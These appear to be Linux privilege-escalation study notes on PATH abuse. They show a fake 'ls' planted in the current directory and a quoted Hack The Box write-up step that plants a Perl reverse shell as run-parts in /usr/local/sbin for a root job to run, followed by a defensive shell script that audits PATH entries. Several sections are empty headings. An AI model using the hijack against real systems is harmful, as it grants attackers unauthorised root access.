Path Abuse

Check the current PATH with env | grep PATH or echo $PATH.

echo $PATH

/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games

If we can modify a user's PATH, we could replace a common binary such as ls with a malicious script such as a reverse shell. If we add . to the PATH by issuing the command PATH=.:$PATH and then export PATH, we will be able to run binaries located in our current working directory by just typing the name of the file. Because . is now the first entry, a file there is found before the system binary of the same name.

~$ PATH=.:${PATH}
~$ export PATH
~$ echo $PATH

.:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games
~$ touch ls
~$ echo 'echo "PATH ABUSE!!"' > ls
~$ chmod +x ls
~$ ls

PATH ABUSE!!

Example 1

2019/10/08 10:56:02 CMD: UID=0    PID=2689   | sh -c /usr/bin/env -i PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin run-parts --lsbsysinit /etc/update-motd.d > /run/motd.dynamic.new

# PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin

jkr@writeup:~$ which run-parts
/bin/run-parts

#
jkr@writeup:~$ cp perl-reverse-shell.pl run-parts
jkr@writeup:~$ ls
perl-reverse-shell.pl  run-parts  user.txt
jkr@writeup:~$ mv run-parts /usr/local/sbin

Ref: HTB - Write-Up
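
Added example, not part of the original notes: a POSIX shell audit for the two conditions shown above, a relative entry such as . in PATH and a group- or world-writable directory that is searched before the one holding the real binary. The function names and reason labels are this example's own.

```sh
#!/bin/sh
# Added example (not from the original notes): audit a PATH string for the two
# weaknesses shown above. Function names and labels are this example's own.

# risky_entry DIR -> prints a reason and returns 0 if DIR is unsafe in a PATH.
risky_entry() {
    case $1 in
        /*) ;;                              # absolute: check permissions below
        *)  echo RELATIVE; return 0 ;;      # "", "." or anything cwd-relative
    esac
    [ -d "$1" ] || return 1                 # nonexistent entries are skipped
    perms=$(ls -ld "$1/." | cut -c1-10)     # "/." follows symlinks like /bin
    case $perms in
        ?????w*|????????w*) echo GROUP_OR_WORLD_WRITABLE; return 0 ;;
    esac
    return 1
}

# audit_path PATHSTRING -> one "REASON entry" line per risky entry, in order.
audit_path() (
    rest="$1:"                              # trailing ':' terminates last field
    while [ -n "$rest" ]; do
        entry=${rest%%:*}; rest=${rest#*:}
        if reason=$(risky_entry "$entry"); then
            printf '%s %s\n' "$reason" "${entry:-<empty>}"
        fi
    done
)

# hijackable CMD PATHSTRING -> risky entries searched up to and including the
# directory that holds CMD; a file named CMD in any of them would run instead.
hijackable() (
    rest="$2:"
    while [ -n "$rest" ]; do
        entry=${rest%%:*}; rest=${rest#*:}
        if reason=$(risky_entry "$entry"); then
            printf '%s %s\n' "$reason" "${entry:-<empty>}"
        fi
        if [ -f "${entry:-.}/$1" ] && [ -x "${entry:-.}/$1" ]; then break; fi
    done
)

# The PATH from the process line in Example 1, checked for run-parts.
hijackable run-parts /usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
```

Any line printed for a PATH used by a root-owned job means a less privileged account may be able to decide what that job executes; tighten the directory's mode or group, or drop the entry from that job's PATH.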

Example 2

Example 3

Resources
